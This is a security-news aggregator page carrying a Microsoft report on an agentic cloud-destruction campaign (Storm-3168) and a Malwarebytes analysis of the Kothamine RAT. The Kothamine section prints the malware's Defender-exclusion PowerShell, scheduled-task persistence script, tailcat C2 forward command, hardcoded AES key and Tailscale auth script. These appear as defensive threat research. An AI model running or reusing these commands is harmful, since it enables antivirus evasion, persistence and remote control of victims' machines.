Feed aggregator

N-Th Numbers

Hacker News - Fri, 09/25/2026 - 11:56am
Categories: Hacker News

Storm-3168: Agentic-driven cloud attacks using compromised service principals

Microsoft Malware Protection Center - Fri, 09/25/2026 - 11:35am
In this article
  1. Attack overview
  2. Technical analysis
  3. Mitigation and protection guidance
  4. References
  5. Learn More

Microsoft Security Research has identified malicious cloud activity associated with JADEPUFFER, a threat actor discovered by Sysdig in July 2026 and reported to be the first documented agentic ransomware operation. Our investigation found an extensive Azure-focused resource destruction activity using compromised service principals and cloud credential collection that could be used to facilitate future exfiltration.

These findings expand the publicly documented activity associated with JADEPUFFER, tracked by Microsoft as Storm-3168, demonstrating an evolution in the threat actor’s cloud operations and providing the first detailed view into its Azure activity. We identified bulk destructive operations in a compromised Azure environment. The destructive operations were facilitated by compromising service principals and targeted Azure Storage Accounts, SQL databases, Key Vaults, Function Apps, recovery protection locks, Virtual Machines, and App Services.

Organizations can reduce exposure by protecting workload identities and secrets, enforcing least privilege, safeguarding recovery resources, and enabling relevant Microsoft Defender for Cloud protections. Publicly exposed credentials remain usable until revoked or rotated; removing the original disclosure alone does not remediate the exposure.

This activity highlights a broader shift toward AI-orchestrated attacks, where threat actors can coordinate complex post-compromise operations across cloud environments with greater speed and scale. As these capabilities evolve, defenders must similarly use AI to investigate and respond across large environments. Rather than requiring analysts to manually follow each individual action, efforts such as Project Perception and MDASH are intended to support a model in which defenders can investigate and respond across increasingly large and complex environments using AI.

Attack overview

Microsoft observed two compromised service principals belonging to the same tenant. One performed reconnaissance and resource discovery. The other performed discovery, destructive operations, and credential collection.

Discovery before destruction

For the impacted tenant, in early June 2026, one of the compromised service principals enumerated Azure Virtual Machines, subscriptions, resource groups and resources for about 15 hours and 30 minutes with 300+ successful read operations. This breadth of activity would give the threat actor visibility across the organization’s Azure environment.

About 90 minutes after the first compromised service principal started enumeration, the second compromised service principal enumerated virtual machines and resource groups across two subscriptions in five seconds. Both service principals used Storm-3168 linked infrastructure, the same network fingerprint, and the user agent python-requests/2.34.2.

16 hours later, the second service principal successfully enumerated Azure App Service configuration stores, possibly looking for exposed credentials. It also unsuccessfully attempted to look for Azure OpenSearch resources.

70 seconds after this final inventory operation, the same service principal also attempted a ListKey operation against a non-existent storage account.

A seven-minute destructive sequence

Less than one second after the unsuccessful ListKey operation against a non-existent storage account, the second compromised service principal began with its destructive activities. This compromised service principal then attempted 150+ destructive or credential collection related operations in 35 minutes.

The destructive sequence lasted for about 7 minutes. This involved 100+ storage account deletion attempts. Most Azure Storage accounts targeted by the threat actor were successfully deleted. However, Azure resource locks and storage account-level deletion protection blocked deletion attempts for few of the storage accounts, demonstrating the value of independent safeguards that remain effective even when a compromised identity has broad administrative permissions. An Azure Key Vault, Function App, App service plan were also deleted, all of which belonged to the same resource group and appeared to support the Function app.

The same service principal also attempted to delete multiple Azure SQL databases in parallel with the storage account deletions mentioned earlier, but every deletion attempt failed because it used an unsupported API version for the Azure SQL database resource type.

Multiple unsuccessful deletion attempts were also made against Azure Site Recovery locks and Azure Backup protection locks protecting storage accounts.

Credential collection

About 30 minutes after the final destructive activity, the same service principal made an inventory request for Azure Storage Accounts and sent 30+ successful ListKeys requests, asking ARM to return each storage account’s access keys. These storage accounts included Azure Site Recovery related storage accounts.

Technical analysis Possible initial access
  • Credential exposure: While it is unclear how the service principal was initially compromised, its client ID, client secret, and tenant ID had previously been exposed in plaintext in a public GitHub issue by an employee of the impacted organization. The issue was later edited to remove the secret, but the secret remained accessible through the issue’s public edit history. Removing or redacting an exposed secret does not invalidate it; credentials exposed in any public internet location should be treated as compromised and promptly revoked or rotated. We could not confirm whether this secret was used for the activity described here.
  • Application Probing: Since the beginning of this year, we also observed repeated probing from Storm-3168 linked infrastructure against multiple Azure App services for different customers, against sensitive paths related to WordPress administration, PHP-CGI, LangFlow’s code validation endpoint (/api/v1/validate/code) and other web-shell like paths. However, the App Service targets did not overlap with the affected Azure subscriptions, and we found no App Service to ARM (Azure Resource Manager) credential path for the impacted tenant.
Coordinated automation

The timing between the different operations and the division of work using multiple service principals and overlapping token streams from the same service principal strongly indicates automated or scripted execution.

We observed five unique tokens issued for the service principal used for destruction and credential collection – four tokens supported deletion, while the fifth token handled storage inventory and key retrieval. Two of the tokens used for deletion were active during the same 70 second period. While one of these tokens focused on Storage account deletion, the other focused on a mixture of Storage and SQL deletion.

While the Key Vault, Function App, and App Service plan associated with the same application were deleted, a similarly named storage account in the same resource group was spared and later targeted by the compromised service principal through a successful ListKeys operation.

The operations followed the identity’s existing Azure role assignments. A group-granted Storage Account Contributor role authorized the destructive storage operations. Direct Contributor access authorized the three application-resource deletions and the one additional successful key retrieval. Direct SQL DB Contributor access authorized the multiple SQL deletion attempts, which were ultimately unsuccessful because of the unsupported API version used for the Azure SQL Database resource type.

Destructive activity indicative of a ransomware-aligned objective

The threat actor deleted numerous Azure resources, while also targeting backup and recovery related resources such as Azure Site Recovery locks or Azure Storage Accounts which had terraform and backup themed names, potentially intending to impair the victim’s ability to recover from the destructive activity.

The parallel targeting of Azure SQL databases and storage accounts suggests an effort to broaden the destructive impact across different data services rather than concentrating on a single resource type. Although the database deletions were unsuccessful, their inclusion in the same destructive sequence provides additional insight into the intended scope of the activity.

The compromised service principal also made multiple attempts to retrieve storage account keys, which could provide access to sensitive data.

Taken together, the resource destruction, attempts to interfere with recovery mechanisms, and collection of credentials that could provide access to data are consistent with tactics that can support ransomware and extortion operations.

However, we did not observe a ransom note or confirm successful data exfiltration in the activity described here.

Mitigation and protection guidance

Microsoft recommends the following mitigations to reduce the risk and impact of activity similar to that observed in this campaign:

  • Enable appropriate Microsoft Defender for Cloud plans for critical Azure workloads. Consider enabling workload protections relevant to the resources in your environment, including Defender for Resource Manager, Defender for Storage, Defender for Key Vault, Defender for App Service and Defender for Databases. Learn more in the Microsoft Defender for Cloud overview.
  • Protect and continuously assess application credentials and secrets. Avoid storing service principal credentials, storage keys, connection strings, and other secrets in source code, configuration files, public repositories, issues, or other locations where they might be inadvertently exposed. Learn more in the Microsoft Entra Workload ID documentation.
  • Rotate compromised or exposed credentials immediately and establish credential lifecycle practices. Treat credentials that have been publicly exposed as compromised, even if the original location has subsequently been edited or deleted. Removing the content does not invalidate the credential or eliminate copies retained in edit history, caches, archives, logs, or other systems. Immediately revoke or rotate the affected credentials and investigate their historical use. Where supported, organizations should favor mechanisms that reduce reliance on long-lived credentials. Learn more about protecting secrets with Defender for Cloud.
  • Apply least privilege to service principals and other workload identities. Review the Azure RBAC permissions assigned to service principals and restrict their privileges to the resources and operations required by their applications. Learn more about best practices for Azure RBAC.
  • Protect backup and recovery infrastructure as part of ransomware resilience. Restrict access to backup and recovery resources and closely monitor attempts to modify or remove their protection controls. Learn more about Azure Backup security best practices.
  • Scale investigation and response with agentic defenses. Use Project Perception to help defenders deploy AI agents that investigate and respond across large, complex environments at machine speed.
  • Strengthen security posture for AI applications and agentic systems. Use Microsoft Defender for AI Security (codename MDASH) to discover AI assets, identify vulnerabilities and misconfigurations, and reduce exposure to AI-related attack paths.
Microsoft Defender XDR detections

Microsoft Defender XDR customers can refer to the list of applicable detections below.

TacticAlert nameDefender for Cloud CoverageCollection, ExfiltrationPossible data exfiltration detectedDefender for App ServicesExfiltration– An abnormally large number of rows were extracted from an SQL server
– Unusual volume of data extracted (Azure Cosmos DB)
– Access from an unusual location Defender for DatabasesPersistence, Execution, Command and ControlCommunication with suspicious domain identified by threat intelligenceDefender for DNSExfiltration– Unusual amount of data extracted from a storage blob container
– Unusual number of blobs extracted from a storage blob container
– Unusual amount of data extracted from a sensitive blob container
– Unusual amount of data extracted from a storage file share
– Unusual number of files extracted from a storage file shareDefender for StorageInitial Access– Access from a known suspicious IP address to a sensitive blob container
– Access from a suspicious IP address
– Access from a known suspicious IP address to a sensitive storage file shareDefender for Storage Defense EvasionAzure Resource Manager operation from suspicious proxy IP addressDefender for Resource ManagerCredential Access– Unusual operation pattern in a key vault
– High volume of operations in a key vault
– Unusual application accessed a key vaultDefender for Key Vaults

Microsoft Defender XDR coordinates detection, prevention, investigation, and response across cloud endpoints, identities, email, and apps to provide integrated protection against attacks like the threat discussed in this blog. Customers with provisioned access can also use Microsoft Security Copilot in Microsoft Defender to investigate and respond to incidents, hunt for threats, and protect their organization with relevant threat intelligence.

Microsoft Security Copilot

Security Copilot customers can use the standalone experience to create their own prompts or run the following prebuilt promptbooks to automate incident response or investigation tasks related to this threat:

  • Incident investigation
  • Microsoft User analysis
  • Threat actor profile
  • Threat Intelligence 360 report based on MDTI article

Note that some promptbooks require access to plugins for Microsoft products such as Microsoft Defender XDR or Microsoft Sentinel.

Threat intelligence reports

Microsoft Security Copilot customers can also use the Microsoft Security Copilot integration in Microsoft Defender Threat Intelligence, either in the Security Copilot standalone portal or in the embedded experience in the Microsoft Defender portal to get more information about this threat threat.

MITRE ATT&CK Techniques observed

The following MITRE ATT&CK mappings reflect behaviors observed during this activity.

  • T1190 Exploit Public-Facing Application | Storm-3168 linked infrastructure repeatedly probed sensitive application paths on applications hosted in Azure App Service for potential exploitation.
  • T1078.004 Valid Accounts: Cloud Accounts | Compromised service principals were used for Azure resource discovery and destruction.
  • T1526 Cloud Service Discovery | The identities enumerated subscriptions, virtual machines, resource groups, Azure Storage, Web Apps, App Service plans, locks, and Recovery Services.
  • T1485 Data Destruction | Azure Storage, Key Vault, Function App, and App Service plan resources were deleted. Azure SQL deletion was also attempted, extending the destructive objective toward databases.
  • T1490 Inhibit System Recovery | Site Recovery disk locks and an Azure Backup protection lock were targeted for deletion
Indicators of compromise (IOC) IndicatorTypeDescription45.131.66[.]106IPv4App Service probing and malicious ARM requests34.153.223[.]102IPv4App Service probing64.20.53[.]230IPv4App Service probing References Learn More

For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog.

To get notified about new publications and to join discussions on social media, follow us on LinkedIn, X (formerly Twitter), and Bluesky.

To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast.

Review our documentation to learn more about our real-time protection capabilities and see how to enable them within your organization.  

The post Storm-3168: Agentic-driven cloud attacks using compromised service principals appeared first on Microsoft Security Blog.

Categories: Microsoft

In Other News: Clop Leak Site Takeover, Docker Botnet Hunts AI Keys, Water Utility Exposure

Security Week - Fri, 09/25/2026 - 11:07am

Noteworthy stories that might have slipped under the radar: BragJack attack against browser AI assistants, TDengine flaw threatens industrial telemetry uptime, Ubuntu update overhaul.

The post In Other News: Clop Leak Site Takeover, Docker Botnet Hunts AI Keys, Water Utility Exposure appeared first on SecurityWeek.

Categories: SecurityWeek

LinkedIn adds new checks for fake profiles and work histories

Malware Bytes Security - Fri, 09/25/2026 - 11:04am

LinkedIn is adding trust and verification features aimed at making fake professional identities, invented work histories, and company impersonation harder to pull off.

The company is responding to an environment in which generative AI enables imposters to create an entirely made-up professional persona. It reduces the cost of creating convincing headshots, biographies, résumés, outreach messages, and recommendations.

LinkedIn’s new features use verified people and company Pages to help check other users’ claims.

Colleague and classmate vouching: People can confirm that they worked or studied with someone during the period listed on that person’s profile. This confirms an affiliation; it does not rate the person’s ability or recommend them.

Employer control over false affiliations: Admins of verified company Pages can remove people who falsely claim to work there from the company’s associated people and search results. This doesn’t remove the person’s profile or erase the claim from it.

Workplace verification requirement (in testing): LinkedIn is testing a setting that would require people who want to associate themselves with a company Page to verify their workplace, for example, through a work email address.

Verified identity beyond LinkedIn: LinkedIn is extending partnerships that let users display their LinkedIn-verified identity elsewhere. New partners include Truecaller and PeerSpot, alongside Adobe and UserTesting.

LinkedIn hopes that multiple visible signals such as identity verification, workplace verification, peer corroboration, and company Page controls will make a fabricated profile less persuasive. It says its existing verification tools have verified 115 million members and more than 700,000 companies.

LinkedIn VP of Product Oscar Rodriguez told TechCrunch:

“We’ve been invested in [verification] because we believe that authenticity will be the single most valuable currency on the internet.”

These new affiliation checks cannot tell a job seeker whether an opportunity is genuine. A scammer does not always need to impersonate a major employer. They can invent a convincing startup, build a polished company Page, and use fake job listings or recruiters to lure applicants. The checks may be less helpful if the supposed employer itself is part of the scam.

As we’ve seen in recent research, criminals pose as both well-known companies and appealing new ventures offering the kind of role a job seeker hopes to find. The new checks may help someone determine whether a supposed recruiter is affiliated with a company they recognize. They may be less helpful when the company itself is part of the scam.

Verification is therefore a useful signal, not a guarantee. Job seekers should still be wary of unsolicited approaches, pressure to move conversations off LinkedIn, requests to install software or share identity documents, and job offers that arrive before a credible interview process. Check a recruiter’s affiliation, visit the employer’s website independently, and confirm that its contact details and job listing match.

LinkedIn’s changes acknowledge a growing problem: AI can make a fake professional identity look remarkably polished. Verified accounts, workplace affiliations, and colleague confirmations may become more valuable to criminals, too. They may try to exploit those signals through stolen accounts, manipulated verification, or carefully constructed networks of fraudulent profiles. Verification can raise the cost of deception, but it cannot replace healthy skepticism.

Scammers don’t need to hack you. They just need you to click once. 

Malwarebytes Identity Theft Protection catches suspicious activity before it becomes a problem.

Categories: Malware Bytes

Kothamine malware uses Tailscale’s tailcat to evade network detection 

Malware Bytes Security - Fri, 09/25/2026 - 10:57am

We discovered an undocumented remote-access Trojan (RAT) called Kothamine Agent. It supports more than 30 commands and it gives attackers control of an infected Windows computer: they can run commands, read and change files, and add new capabilities. Some versions can also steal browser data and record through the camera and microphone. 

We found Kothamine linked to malicious npm packages, which could put users and developers who install those packages at risk. In recent versions, the malware uses tailcat, an open-source tool from Tailscale, to receive commands over an encrypted connection. That makes its communications harder to inspect and gives defenders no conventional command-and-control (C2) domain to block.

Based on VirusTotal uploads and GitHub commits, Kothamine appears to have been in development or distribution since at least July. Earlier versions used the Tailscale VPN instead of tailcat. Depending on the build, the malware includes the networking tools or downloads them from sources including GitHub.

How to stay safe 

Before installing an unfamiliar npm package, check its repository, maintainers, dependencies, and recent releases. Search for reports of malicious activity, and favor packages with an established history and regular maintenance.

  • Check the name carefully. Make sure you aren’t downloading a fake package with a similar name. 
  • Check the developer or organization and make sure the publisher appears legitimate. Check, for example, if it has a website or a GitHub repository. 
  • Read some reviews, issues and reports. Search for the package name on Google and check for reports of detected potential malware. 
  • Look at how popular it is. A package with many downloads and users is generally easier to verify than a brand-new package with almost no history. 
Technical analysis Kothamine and the malicious npm packages

Kothamine is written in C and C++. In the majority of the samples we analyzed, it consists of an injector and a DLL containing the agent. The agent supports more than 30 commands, allowing the operator to control the infected system and load additional DLLs to extend its capabilities.

Kothamine Agent execution

Kothamine Agent has undergone some changes over time.  Earlier versions we found on VirusTotal used the Tailscale VPN rather than tailcat, and the strings were not encrypted. Some features, including a User Account Control (UAC) bypass and stealer commands, were detected only in certain builds. 

In some versions, Kothamine downloaded Tailscale files from the official Tailscale website or a GitHub repository instead of including them in the agent.

The same GitHub repository is cited in an advisory about a malicious npm package named dotnet-runtime-base. The package download npm-sc-legit.exe from that repository.  At the time of writing, two other packages published by the same developer had been removed.

The developer’s removed npm packages

The authors behind these campaigns made a mistake and published instructions for compiling kothamine-stub-cpp in one of the packages. The guide also discusses loading .NET assemblies, which we did not observe in the samples we analyzed.

Instructions for compiling and publishing Kothamine

The npm-sc-legit.exe executable is a compiled version of Kothamine that also contains commands for stealing data. We did not find a panel or builder for Kothamine, but the features present across different builds suggest that operators can enable particular functions and commands as needed.

Executables and DLL hosted on GitHub

The following analysis focuses on a recent Kothamine Agent sample that uses tailcat for C2 communication.

How Kothamine Agent works

In the analyzed versions, an executable internally referred to as Kothamine Injector injects the Kothamine Agent DLL, typically into explorer.exe. We also refer to earlier versions to show how the agent has changed.

1. Kothamine Injector 

Kothamine Injector performs the following operations: 

  • Adds Windows Defender exclusions using PowerShell
  • Copies itself to %ROAMING%\MicrosoftEdgeUpdateCore.exe
  • Extracts the agent DLL to %ROAMING%\MicrosoftEdgeUpdateCore.dll
  • Creates up.ps1 in %TEMP% for persistence
  • Injects the agent DLL into explorer.exe using OpenProcess, VirtualAllocEx, WriteProcessMemory, CreateRemoteThread, and LoadLibraryA
The Kothamine Agent DLL injected into explorer.exe 

The up.ps1 script creates a scheduled task to achieve persistence using the Injector executable: 

$A=New-ScheduledTaskAction -Execute 'C:\Users\{USER}\AppData\Roaming\MicrosoftEdgeUpdateCore.exe'   $T=New-ScheduledTaskTrigger -AtLogOn Register-ScheduledTask 'MicrosoftEdgeUpdateTask' -Action $A -Trigger $T -RunLevel Limited -Force  2. Kothamine Agent  Agent startup 

The agent creates a mutex named Local\KothamineAgentInstance and starts its main thread.

It then runs PowerShell commands to add the executable and DLL to the Windows Defender exclusion list:

powershell -NoP -NonI -W Hidden -Exec Bypass -Command " Add-MpPreference -ExclusionPath 'C:\Users\{USER}\Desktop' -ErrorAction SilentlyContinue;  Add-MpPreference -ExclusionPath 'C:\Users\{USER}\AppData\Roaming\MicrosoftEdgeUpdateCore.exe' -ErrorAction SilentlyContinue;   Add-MpPreference -ExclusionPath 'C:\Users\{USER}\AppData\Roaming\MicrosoftEdgeUpdateCore.dll' -ErrorAction SilentlyContinue;   Add-MpPreference -ExclusionProcess '{PROCESS_NAME}.exe' -ErrorAction SilentlyContinue;  Add-MpPreference -ExclusionProcess 'MicrosoftEdgeUpdateCore.exe' -ErrorAction SilentlyContinue; Add-MpPreference -ExclusionProcess 'MicrosoftEdgeUpdateCore.dll' -ErrorAction SilentlyContinue"

Strings were not encrypted in older versions. Recent versions decrypt strings inline or through functions that use XOR with a different key for each string.

An earlier version with unobfuscated strings showing executed commands Partial output of the script that decrypts the strings in recent versions  C2 communication using tailcat 

The distinctive feature of Kothamine is not technical complexity, the agent functionality or obfuscation, but its use of tailcat and Tailscale VPN to receive commands to execute. This gives the agent a resilient, encrypted communication channel.

Tailcat is a recent open-source project released by the Tailscale team. Tailcat uses Tailscale’s data plane (WireGuard, NAT traversal and DERP) but without its control plane. According to official documentation, this means that tailcat has no IP addresses, accounts, admins, users, administrative controls, or governance. These characteristics therefore make it an attractive tool for use in malware. 

Unlike Tailscale VPN, tailcat does not require an account or device registration. Its developers designed it for short-lived connections.

Since there are no accounts, access is based on possession of a tailcat address and the public keys used to identify the connecting devices. This does not make the connection completely anonymous: hosted relays may retain metadata logs.

The tc-address passed with the forward flag enables the client to obtain the information necessary to correctly route the request. In addition, tailcat does not require privileged access to the machine, as it uses the CLI tool and userspace libraries. 

In recent Kothamine versions, the agent extracts tailcat from its resources and saves it as %ROAMING%\TailscalePortable\tailcat.exe.

Kothamine Agent extracting tailcat from its resources

The tailcat executable is launched with the CreateProcessA function and the following parameters (internally referred to as spawn_tailcat_forward phase): 

"C:\Users\{USER}\AppData\Roaming\TailscalePortable\tailcat.exe" forward  tc…. 18080:4444 

This command makes tailcat server ports available as standard local TCP ports (18080 in this case) and the requests are forwarded to the port 4444 of the operator’s node.  Kothamine uses socket functions to connect to 127.0.0.1:18080, where tailcat is listening. 

If the agent ID string is not empty, the agent sends a profile request encrypted containing the following information (run_c2_loop phase): 

{"name":"base_<rand()>","os":"Windows","ip":"0.0.0.0","auth_token":"af27..,"type":"base"} 

After, the agent enters an infinite loop to receive commands to execute from the C2 (run_c2_loop phase). The agent waits for new commands to execute using the select socket function and periodically sends KEEP-ALIVE messages if a command is not received. 

The messages exchanged with the C2 are encrypted and decrypted using AES-GCM (aes_encrypt phase).  

The 32-byte AES key is base64-decoded from the string (c2_key phase): 

mrowPsW2P5kzFGCNWeKAd+kYpo8Yy5c2pzaOSRuzisU=  Supported commands 

In this build, the Kothamine agent supports 30 commands related to: 

  • Interaction with processes
  • Interaction with file and directory
  • Execute shell commands
  • Extend agent capability based on received DLLs
Command Name Description sysinfo/systeminfo, curpid Return system information, such as PID, current path, hostname, and OS (hardcoded). tasklist, kill Returns the processes obtained via “tasklist /FO CSV /NH“.  Terminates the process specified by the PID using “taskkill /F /PID”. ping Liveness check, “Pong” returns to C2. ipconfig Executes the “ipconfig /all” command and returns the result. exec, shell_execExecutes shell commands with _popen() and send the output back. mkdir, rmdir, cp, mv, cd, ls, dir, pwdInteracts with files and folders on the system. writefile_start, writefile_chunk, writefile_end, writefile, readfile, createfile, delfile, downloadReads, writes and deletes arbitrary files. load_featureWrites and loads a base-64 encoded DLL received.  The DLL is loaded using LoadLibraryA, and the “GetFeatureApi” method, resolved via GetProcAddress, is executed. Save the function pointers required to execute the function. exec_feature, features, list_features, unload_featureIt interacts with loaded features to view, execute, or remove them. 

Given that the other commands are common to the other agents, the focus of the analysis is on the “plugin” system that allows the operator to receive DLLs and extend the agent’s functionality. 

Plugin system 

To load a new DLL, the operator uses the command: 

load_feature <name> <B64EncodedDLL> 

At a high level, the process works as follows. The code and variable names below are reconstructed from usage and output logs.

  1. First, the agent checks whether the functionality has already been loaded and unloads it if so: 
if (g_features.find(name) != g_features.end()) { send_text("[!] " + name + " already loaded, unloading first"); unload_feature(name); }

  

  1. It attempts to create the received DLL in a location obtained through GetTempPath or SHGetFolderPathA, or in the hardcoded path C:\Windows\Temp. It writes the decoded DLL and loads it with LoadLibraryA.
  1. Resolves and executes the GetFeatureApi method of the loaded DLL: 
pGFA = GetProcAddress(hModDLL, "GetFeatureApi"); if (!pGFA) { send_text("[!] GetProcAddress(GetFeatureApi) failed, lastError= …"); FreeLibrary(hMod); return 0; } api = pGFA();

We did not find a DLL that would allow us to fully analyze the structure returned by GetFeatureApi. However, by analyzing the code and the strings, we identified these fields: 

/* Function used for C2 callback */ typedef void (*FeatureSendCb)(void *data, int len); struct FeatureApi { char *version; char *name; void (*init)(FeatureSendCb send); void (*exec)(char *args, FeatureSendCb send); void (*cleanup)(void); };

The pointers to the loaded DLL and the returned structure are saved in the global variable internally called g_features, using this structure: 

struct LoadedFeature { void *hModule; /* Loaded DLL */ struct FeatureApi *api; /* Pointer returned by GetFeatureApi() */ };

                            

  1. Executes the init function contained in the returned structure, passing it the function used for C2 communication: 
send_text("[!] calling init...");  api->init(*feature_send_callback);    send_text("[!] init done");

After the feature is loaded, the operator can execute the loaded feature using the command: 

exec_feature <functionName> [args]  Code that retrieves the structure and executes the exec function Different Kothamine builds: Tailscale VPN, UAC Bypass and stealer commands 

As previously mentioned, we detected versions of Kothamine with different capabilities.

Earlier versions used the Tailscale VPN before tailcat was released. They downloaded and ran the installer from the Tailscale website with the /quiet and /silent flags, or downloaded the required files directly from GitHub. These included tailscaled.exe, tailscale.exe, tailscale-ipn.exe, and wintun.dll.

A Kothamine version that downloads executables and DLLs from GitHub

Some versions bypass User Account Control (UAC) using fodhelper.exe to run elevated.ps1. In the example below, the PowerShell script starts a Tailscale VPN connection:

$tsdir='C:\Users\{USER}\AppData\Roaming\TailscalePortable' $ts='""'+$tsdir+'\\tailscale.exe""' $tsd='""'+$tsdir+'\\tailscaled.exe""' Start-Process -WindowStyle Hidden -FilePath $tsd -WorkingDirectory $tsdir $connected=$false for ($i=0; $i -lt 45; $i++) { Start-Sleep 2 try { &$ts up --unattended=true --auth-key='tskey-auth-…' 2>&1 | Out-Null } catch {} $ip=(&$ts ip 2>&1 | Out-String) if ($ip -match '100\.') { $connected=$true; break } }

The agent then connects to port 4444 at a Tailscale network IP address (100.x.x.x) and starts receiving and executing commands.

A Kothamine version that bypasses UAC using fodhelper.exe

Finally, as we mentioned earlier, different builds of Kothamine support other commands. For instance, the version uploaded to GitHub includes additional commands including getdiscord, getsessions, screenshot, screenshare, and camera. These allow operators to:

  • Steal cookies from various browsers
  • Steal gaming-related JSON files, including files associated with Steam and Minecraft
  • Take screenshots and record through the camera and microphone
  • Access clipboard contents
Indicators of compromise

SHA-256 hashes 

  • ec4219a7ecf132c29080fbb20e4ab410c57faa85aeed7acade1eb15d905a6ee0: Kothamine Injector analyzed in the blog 
  • 74eca3973ad72a6ddc9397aff8250d9ee287211fc9a055d5ee290d01cf76a70c: Kothamine Agent analyzed in the blog 

URLs 

  • https://github[.]com/cphc811-ui/: Repository used to download executables and DLLs associated with the Tailscale VPN 
Acknowledgements    

Mondoo’s advisory on the analyzed npm package.

Browse like no one’s watching. 

Malwarebytes Privacy VPN encrypts your connection and never logs what you do, so the next story you read doesn’t have to feel personal. Try it free → 

Categories: Malware Bytes

North Korea Suspected in $351 Million Bitget Crypto Heist

Security Week - Fri, 09/25/2026 - 10:16am

Bitget’s security systems caught the unauthorized transfers on September 24, and some wallet addresses linked to the attacker have been frozen.

The post North Korea Suspected in $351 Million Bitget Crypto Heist appeared first on SecurityWeek.

Categories: SecurityWeek

Meta is working with NEC, Sumitomo Electric Industries and Orange to deliver petabit transoceanic cabling capacity

Computer Weekly Feed - Fri, 09/25/2026 - 10:07am
Meta is working with NEC, Sumitomo Electric Industries and Orange to deliver petabit transoceanic cabling capacity
Categories: Computer Weekly

Allow Carriers on Planes

Hacker News - Fri, 09/25/2026 - 10:00am
Categories: Hacker News

Pages